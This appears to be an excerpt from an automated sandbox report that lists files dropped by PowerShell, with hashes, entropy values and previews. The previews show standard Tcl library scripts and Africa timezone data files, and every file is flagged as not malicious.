                                                                                                                                                                                                                      Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):620
                                                                                                                                                                                                                      Entropy (8bit):4.702477618616754
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                                                                                                      MD5:07532085501876DCC6882567E014944C
                                                                                                                                                                                                                      SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                                                                                                      SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                                                                                                      SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23995
                                                                                                                                                                                                                      Entropy (8bit):4.884828325514459
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                                                                                                      MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                                                                                                      SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                                                                                                      SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                                                                                                      SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):844
                                                                                                                                                                                                                      Entropy (8bit):4.883013702569192
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                                                                                                      MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                                                                                                      SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                                                                                                      SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                                                                                                      SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):42223
                                                                                                                                                                                                                      Entropy (8bit):4.822635446297551
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                                                                                                      MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                                                                                                      SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                                                                                                      SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                                                                                                      SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5617
                                                                                                                                                                                                                      Entropy (8bit):4.747404679682368
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                                                                                                      MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                                                                                                      SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                                                                                                      SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                                                                                                      SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12204
                                                                                                                                                                                                                      Entropy (8bit):4.763796758810551
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                                                                                                      MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                                                                                                      SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                                                                                                      SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                                                                                                      SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):147
                                                                                                                                                                                                                      Entropy (8bit):4.995501022397479
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QF08x/2DcsBdNMXGm2OHnFvpsYoHsdSalHFLwy:SlSWB9eg/2DBpDm2OHnFvmYoH1alHOy
                                                                                                                                                                                                                      MD5:FF8B5540631A6EE93507338C4E7AA49D
                                                                                                                                                                                                                      SHA1:817B261A1B6B92AA498EC286349964EA10FB5A84
                                                                                                                                                                                                                      SHA-256:7213997BB9CF9D384A7002B8C8EFEF25C01ABA6083D9835A16D583D5DCEE40A0
                                                                                                                                                                                                                      SHA-512:8D78AC4868ED0013EDA536C0E82E0E91398772AA18C637AEFE22F24B142FCDA55A4CB853B2282951E907C9E2F62BD3F831A5CF995F52898F5225D16889943A9C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Abidjan) {.. {-9223372036854775808 -968 0 LMT}.. {-1830383032 0 0 GMT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):183
                                                                                                                                                                                                                      Entropy (8bit):4.832432925672155
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dc9XfBQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DUGDBS
                                                                                                                                                                                                                      MD5:52FDFD3DB98475FBBB620D0D5565C5CC
                                                                                                                                                                                                                      SHA1:C7750452859663605272553DBEE0B6C134E1517C
                                                                                                                                                                                                                      SHA-256:6040827AFED8CEF45F252FBD7E3E862C0B5E9D06C1C98C58BAD61DFE67BD57CC
                                                                                                                                                                                                                      SHA-512:2FF9D96D81279148A86BE208FEEACCBCB8B4224D093D6C092ECD1C4EA2186589CCF947027D3A726600C703611B4CFEE029AA14ED3E8593C477B427C4F342CF27
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Accra) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):189
                                                                                                                                                                                                                      Entropy (8bit):4.817170256300069
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DczqIVDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DnaDkO
                                                                                                                                                                                                                      MD5:30CDD4D37E9DD60FBF6D754C9343F364
                                                                                                                                                                                                                      SHA1:56F896C21068764B7B8F884F374B18913CA3D9CA
                                                                                                                                                                                                                      SHA-256:E11FD8AD8572B684333810CFDC23B92E1ACF619875866985E288D92F8277D07F
                                                                                                                                                                                                                      SHA-512:78FC8043CCE25713404E70996229E5EA8238BF5C0F59029064EDA5494E2D4F54398931F3D855E30C82B2C53B789C40EE4CBF09D0F98C2BA6734595D4AA75017A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1080
                                                                                                                                                                                                                      Entropy (8bit):4.187497782275587
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:MB862D7nmdHh5Cv6/lHY8SOSuvvzXipFSgSO5vW5aKmvbsF6VWsXN87QBWcAFy:5veSvKlHYXNujXipFSjKRKXiWsXCGWJy
                                                                                                                                                                                                                      MD5:E8D3DF11CE0E7575485573FA07D955D5
                                                                                                                                                                                                                      SHA1:3B2C00C85B6C0BFAA1C676C970D6DF1B4BDC3D4A
                                                                                                                                                                                                                      SHA-256:E6874647561CE1C5FD1F650C9B167F77AC5B24FD2026046399A9043CF998E5C4
                                                                                                                                                                                                                      SHA-512:E2968BE847622CF243C0E498436FD21BDC2E1DF0FD8D694F2C70569D17CE896CDE4968BB8ABDEF9F687439E4EA2D955AE87D6C15E81F881EE1413416A90765D4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Algiers) {.. {-9223372036854775808 732 0 LMT}.. {-2486592732 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1531443600 0 0 WET}.. {-956365200 3600 1 WEST}.. {-950486400 0 0 WET}.. {-942012000 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796262400 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766630800 3600 0 CET}.. {-733280400 0 0 WET}.. {-439430400 3600 0 CET}.. {-212029200 0 0 WET}.. {41468400 3600 1 WEST}.. {54774000 0 0 WET}.. {231724800 3600 1 WEST}.. {246240000 3600 0 CET}.. {259545600 7200 1 CEST}.. {275274000 3600 0 CET}.. {309740400 0 0 WET}.. {
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.801054282631739
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjEUEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DGs+DR
                                                                                                                                                                                                                      MD5:A543BDEB3771017421FB75231F0004F2
                                                                                                                                                                                                                      SHA1:D682C58C27562FF3ABAB8EDE8EB6EA754DA7C02E
                                                                                                                                                                                                                      SHA-256:064EB7F9A1FA05A317C6BDCA6B102BC1560D980758F9E4DDB010C9E7DC068ECB
                                                                                                                                                                                                                      SHA-512:44848D60EDC79AF784A819714C0D9F62DCCB6329B47F25D74AB8C174BF9EC3F783C66FEB27F588A93FABA9BECAF076F453D6D797CE4F28461F7AE69440EA54C7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.806258322241929
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjAWDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2D8DkOn
                                                                                                                                                                                                                      MD5:1B5E386E7A2F10D9385DE4C5683EBB85
                                                                                                                                                                                                                      SHA1:FECBA599C37493D2E0AEE8E21BAB40BF8E8DC82A
                                                                                                                                                                                                                      SHA-256:76939852A98EA7BF156D0AC18B434CC610DAF5232322C0FBB066CD52C5B72AF7
                                                                                                                                                                                                                      SHA-512:B36FABFCDB2187A3A4A211C8E033D96C91E3C4D47907D284E10786555562C82231566033EAB4753EF1E48DF1233CFC8C6C0FB3CA50748BE0B2554A972A88FBA0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.883634030944169
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcxAQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwNDBS
                                                                                                                                                                                                                      MD5:6B9BB5B37C41AA727E31BF03483DC1CA
                                                                                                                                                                                                                      SHA1:CB3BBA37B063EA4A54CD15C6E30C14D8CA30D3C0
                                                                                                                                                                                                                      SHA-256:F6D1BA22115A6565B6D6ABEB578F001DDB41E673C422C8EA70D0DF77B24115F6
                                                                                                                                                                                                                      SHA-512:23DB3E298FDEB165FD85D99E03C00835B584984B814AF7F54A9CDD4A9F93E16B0C58342D319129F46CF8EC36F93DE5EA51B492CA4CABDAB75D84709BC6C26119
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Bamako) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):178
                                                                                                                                                                                                                      Entropy (8bit):4.882974805254803
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcx2m/2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dw/2D4yn
                                                                                                                                                                                                                      MD5:92FF9E5835C0C80F358BFE69120660A0
                                                                                                                                                                                                                      SHA1:724758B43BD79DD8A29B02BE6910D492924F8280
                                                                                                                                                                                                                      SHA-256:5047A507D22B68C9349EB6A48C41C80DB4C69F98F99C6574059DEA87178E36C0
                                                                                                                                                                                                                      SHA-512:6FCB709DB4AC19191FECE1E8BAC55E77F265B5AF89F7A3565F06BFAF0BEE12E3EAF2F52CA09C68D75C358C25A31867505CE8AD75D7386DCD15F4BE1CE61272CD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Bangui) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.888193386512119
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcx79FHp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dw7J4c
                                                                                                                                                                                                                      MD5:46E5703CF284E44E15E5872DF075FCBC
                                                                                                                                                                                                                      SHA1:EA4BFA6D568DFA877F72302ADA21ECC2840D9FD5
                                                                                                                                                                                                                      SHA-256:77E610A02CCECE3045B09D07A9BE6100F5AA9C3C2AEB543535C9AE941194F4E4
                                                                                                                                                                                                                      SHA-512:1454467FE63E97DFA4DE66E359F68B2D80C92CDE59FC15A4BE513629FFD154D2281EADF3FC78F7AFDDF5A5896195F3A69E66697A659BBB1A0EAFD3E1DA6565EC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Banjul) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):176
                                                                                                                                                                                                                      Entropy (8bit):4.847843768169462
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QF08x/2Dc5iDMXGm2OHGVkeoHsdSawwF6hSVPVFwy:SlSWB9eg/2D4uDm2OHCkeoH1awwFMmMy
                                                                                                                                                                                                                      MD5:7E710C939B9CC0C1AC1ECF4239B543C5
                                                                                                                                                                                                                      SHA1:429CC87086FB22727815ED05AC6472333FF06013
                                                                                                                                                                                                                      SHA-256:2A870E534DE67713C27F2F3B9BF26FA7498C240CF633988CE76DBDAC5B69214D
                                                                                                                                                                                                                      SHA-512:70D9365C31C43A95211FC20E9290B24D356FFEFA935B8829CE32831026A196DECDD12226097F6DA3B4B919E137AA0181714680CDBB72B00C130A87E3A4735004
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Bissau) {.. {-9223372036854775808 -3740 0 LMT}.. {-1830380400 -3600 0 -01}.. {157770000 0 0 GMT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):183
                                                                                                                                                                                                                      Entropy (8bit):4.904342145830274
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc8ycXp75h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAmp1hs
                                                                                                                                                                                                                      MD5:7AD3749D7047855CB9B9EC9696015402
                                                                                                                                                                                                                      SHA1:F792359AD9EEC2ABD98DAFA6661C1E57BAB89EBE
                                                                                                                                                                                                                      SHA-256:8F700409B8EEE33ACE5F050414971FFEE0270949842E58E9299BB5CD6CCF34DE
                                                                                                                                                                                                                      SHA-512:681C1B318746C587DEBA6E109D1D5A99D1F3E28FE46C24F36B69D533D884FDDC6EA35BB31A475575D683B73BF129FED761523EC9285F2FF1E4CACA2C54C046C5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Blantyre) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):183
                                                                                                                                                                                                                      Entropy (8bit):4.901235831565769
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DciE0TMJZp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D4qGp4D1
                                                                                                                                                                                                                      MD5:7028268EE88250AC40547A3FDBBFC67C
                                                                                                                                                                                                                      SHA1:5006D499CD1D1CB93EB3DA0EC279F76B7123DAA6
                                                                                                                                                                                                                      SHA-256:596DB2D64CDD6250642CB65514D5BCB52F3E3EA83F50D8915D9D4FDEA008F440
                                                                                                                                                                                                                      SHA-512:D623C69FE8A6050E77FB819C2F5FAEE35D5034182B1D30A409C17208155501656133E774E402875537335F8201E4734A0B5D327712CBF623AC330F1014D9025B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Brazzaville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.947752840781864
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DclbDcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkbDEi
